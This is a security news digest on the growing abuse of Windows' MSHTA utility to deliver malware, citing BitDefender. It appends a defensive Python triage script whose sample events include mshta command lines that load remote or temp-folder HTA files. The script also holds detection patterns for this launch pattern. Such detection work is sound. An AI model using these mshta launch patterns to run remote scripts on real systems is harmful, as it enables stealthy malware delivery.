Legacy Windows Tool MSHTA Fuels Surge in Silent Malware Attacks
Briefly

"MSHTA is designed to execute HTML application (HTA) files, which are programs written in HTML, VBScript or JavaScript. An HTA file loaded from an offsite server can be manipulated to run VBScript in memory. The local server would only see the activity of a trusted and MS-signed binary, not what is happening in memory. Because of that trust and the continued legitimate use, it would be difficult to block automatically. The result is that invisible malicious code could be introduced, and that code could then download further LOLBIN components ultimately leading to the implementation of dangerous malware."
"MSHTA provides attackers with a built-in, Microsoft-signed utility that can retrieve and execute remote script content during the initial or intermediate stages of an infection chain. Attackers start the process through basic social engineering. Delivering malware One common abuse of MSHTA detected by BitDefender involved the use of the HTA CountLoader t"
"Over the years, legitimate use of MSHTA has declined. Abuse, however, has grown. MSHTA is increasingly used by bad actors as a Living-off-the-Land binary (LOLBIN) to silently deliver a growing range of malware - ranging from commodity stealers and loaders to advanced and persistent malware such as PurpleFox."
"Since the start of this year, BitDefender has detected a dramatic rise in MSHTA-related activity. The firm believes this reflects increased threat actor use rather than renewed administrative adoption."
MSHTA has shipped with Windows since 1999 and remains available in current releases, including through Edge IE mode, to preserve backward compatibility. Legitimate use has declined while abuse has grown, with threat actors using MSHTA as a living-off-the-land binary to deliver malware silently. MSHTA executes HTML application (HTA) files written in HTML, VBScript, or JavaScript. When an HTA is loaded from an offsite server, it can be manipulated to run VBScript in memory; the local host sees only a trusted, Microsoft-signed binary, not what is happening in memory. That trust, combined with continued legitimate use, makes automated blocking difficult, so the invisible malicious code can download additional LOLBIN components and ultimately lead to dangerous malware such as PurpleFox. BitDefender reports a dramatic rise in MSHTA-related activity, which it attributes to increased attacker use rather than renewed administrative adoption.
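Because mshta.exe cannot simply be blocked, defenders typically alert on how it is launched instead. The following Python triage is an added example (not code from the SecurityWeek article or from BitDefender) that runs over constructed, Sysmon-style process-creation records with the assumed field names Image, CommandLine and ParentImage, and flags launches that match the pattern described above: a remote HTA, a document application as parent, or an HTA staged in a user-writable folder.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style (Event ID 1) process-creation records for illustration only.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Contoso\Tools\inventory.hta"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/update.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\SysWOW64\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Users\alice\AppData\Local\Temp\invoice.hta"',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe http://example.invalid/readme.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# Parents whose spawning of mshta.exe usually means a lured user opened a document (assumed list).
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
# Path fragments of locations an unprivileged user can write to (assumed list, lower-case).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")


def classify_mshta_event(event):
    """Return the reasons an mshta.exe launch looks like LOLBIN abuse ([] when nothing fires)."""
    image = PureWindowsPath(event["Image"]).name.lower()
    if image != "mshta.exe":
        return []
    cmd = event["CommandLine"]
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    reasons = []
    if REMOTE_URL.search(cmd):
        reasons.append("remote HTA: script body never touches disk on the host")
    if parent in DOCUMENT_PARENTS:
        reasons.append(f"spawned by document application {parent}")
    if any(marker in cmd.lower() for marker in USER_WRITABLE):
        reasons.append("HTA loaded from a user-writable location")
    return reasons


def triage(events):
    """Map the index of each suspicious event to its reasons; benign launches are omitted."""
    return {i: r for i, e in enumerate(events) if (r := classify_mshta_event(e))}


if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {i}: {SAMPLE_EVENTS[i]['CommandLine']}")
        for r in reasons:
            print("   -", r)
```

The locally installed, vendor-signed HTA launched from Explorer (event 0) produces no alert, which is the point: the rule keys on launch context rather than on the binary, since the binary itself is legitimate.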
Read at SecurityWeek